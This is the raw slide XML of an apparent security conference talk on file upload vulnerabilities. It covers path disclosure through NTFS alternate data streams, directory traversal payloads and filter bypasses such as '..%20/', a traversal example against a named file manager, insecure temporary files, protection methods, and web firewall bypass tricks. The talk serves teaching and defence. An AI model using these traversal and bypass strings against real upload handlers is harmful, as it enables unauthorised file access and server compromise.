              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Eldar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Marcussen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” - http://www.justanotherhacker.com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7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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>isclosure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Included libraries are not always safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File system and webserver are important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Different method for path disclosure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File/Directory/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Symlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> already exists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filename is too long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NTFS: 255 characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forbidden characters or reserved words</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WinOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“&lt;&gt;?|:*"” + Control Characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WinOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: CON, NUL, COM1, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sensitive file system patterns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NTFS ADS: “:$I30:$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>INDEX_ALLOCATION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” or “::$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>BITMAP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Permission Denied</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79736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 Example: Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disclosure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GleamTech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FileVista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>v4.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uploading “test” as a file when we have a directory with the same name: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869" y="3356992"/>
            <a:ext cx="6418263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0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Tip: Create a Folder by File Upload!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NTFS ADS: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FolderName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>::$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Index_Allocation</a:t>
            </a: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	Or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FolderName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:$I30:$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Index_Allocation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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164592" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Short Demo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>YouTube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67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Me – Soroush Dalili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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pplication Security Researcher since 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Finding vulnerabilities in my spare time:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IIS Semi-Colon Problem, IIS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ShortFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Scanner, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>My blog: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://soroush.secproject.com/blog/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter: @IRSDL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Email: IRSDL at Yahoo dot com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4" name="computing64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980212" y="5092774"/>
            <a:ext cx="20669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7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Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Traversal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browsers hide the local path:</a:t>
            </a:r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3496604" cy="397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20888"/>
            <a:ext cx="5343525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3309950"/>
            <a:ext cx="5343525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Note: Anything before the last “/” or “\” in filename is usually ignored by the web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>but it needs to be tested!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23519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…Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traversal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Usually File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Uploaders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> have destination parameter(s)! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can accept an absolute path? Try these:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“C:\”, “\\127.0.0.1\c$\”, “file:///c:\\”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>\\.\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>GLOBALROOT\Device\HarddiskVolume1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>\\?\localhost\c$\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Is it a relative path? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“../”, “..\”, with URL encoding, double URL encoding, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nicode encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other tricks (Code/FS dependent)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dot or Space after filename in windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Incorrect protections: Example: replacing “../” with nothing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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39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 Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Directory Traversal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GleamTech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FileVista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>v4.6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Bypassing protections for “../” &amp; “..\” by using:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>.. /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” (“..%20/”) &amp; “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>.. \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” (“..%20\”)</a:t>
            </a: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pPr marL="164592" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>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Insecure Temporary File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Accessible via web directly?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Mail attachments: Upload, Download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Processing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: e.g. resizing an image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP temp files on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ile Upload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="ufo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84388" y="3212976"/>
            <a:ext cx="108012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0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305 0.36101 C -0.79305 0.36193 -0.75156 0.29279 -0.75156 0.29302 C -0.7099 0.23682 -0.64358 0.21485 -0.5474 0.21485 C -0.49861 0.21485 -0.45417 0.22317 -0.41979 0.23682 C -0.39566 0.2463 -0.36597 0.25162 -0.33403 0.25162 C -0.27274 0.25162 -0.22083 0.23266 -0.20121 0.2056 C -0.20121 0.20583 -0.17882 0.17322 -0.17882 0.17345 C -0.17882 0.17322 -0.22344 0.24214 -0.22344 0.2426 C -0.26528 0.29695 -0.33125 0.31915 -0.42465 0.31915 C -0.47396 0.31915 -0.52066 0.31059 -0.55746 0.29602 C -0.57969 0.28747 -0.60903 0.28238 -0.63837 0.28238 C -0.69983 0.28238 -0.75156 0.30134 -0.77118 0.32863 C -0.77118 0.32886 -0.79305 0.36101 -0.79305 0.36193 Z " pathEditMode="relative" rAng="0" ptsTypes="fffffffffffff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2" y="-9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 Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Temp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File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/>
              <a:t>Old but still effective for some systems…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SmarterMail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> File Upload Vulnerability:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Temp Uploaded ASP file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Link: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securitytracker.com/id/1013021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GB" dirty="0" err="1"/>
              <a:t>MailSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Express File Upload Vulnerability:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Temp Uploaded and then viewed file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Link: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securitytracker.com/id?1015063</a:t>
            </a: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6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Vulnerabilities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Similar to other Web Apps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Impacts can be highly critical though!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upload a file on behalf of authorities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can make a website vulnerable OR can be vulnerable itself!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When the website uses a database system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Denial of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consuming server’s hard drive? Processing a large image? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And so on…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252525"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="25252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000" y="188640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Client Side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protections: Name and Extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It only makes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the website more user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>friendly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smtClean="0"/>
              <a:t>It is not for security!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data can be manipulated by a web proxy as usual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server Side Protections – Proper ones!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside the code (Internal)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Outside the code (External)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52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Protection Methods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841705"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467544" y="1772816"/>
          <a:ext cx="8280000" cy="4079058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4140000"/>
                <a:gridCol w="4140000"/>
              </a:tblGrid>
              <a:tr h="419134">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Internal</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="3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7121" marR="47121" marT="47121" marB="471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3200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>External</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="3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7121" marR="47121" marT="47121" marB="471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</a:tr>
              <a:tr h="282174">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Content-Type (mime-type)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Firewall: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Request </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Header </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Detection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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3080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>File Name and Extension</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Firewall: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Request Body Detection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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2162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File Header (File Type Detector)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Web </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Server</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> Configurations</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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GB" sz="2000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Content Format</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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 smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Permissions on File system</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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6166">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Compression (Image)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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</a:rPr>
                        <a:t>Antivirus Application</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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3188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Name </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Randomization</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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 smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Storing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> data in another domain</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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9134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Storing files out of accessible web directory</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="47121" marR="47121" marT="47121" marB="471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 marL="47121" marR="47121" marT="47121" marB="471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9834">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="base"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Storing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> files in the database</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB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121" marR="47121" marT="47121" marB="471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en-GB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121" marR="47121" marT="47121" marB="471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2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Bypassing Firewalls: Intro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to have it. But, no matter how good it is, it can be bypassed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Different implementations of RFCs in web servers. e.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using white space characters and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CrLf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in HTTP Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using Multiple fake “Boundary” items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using </a:t>
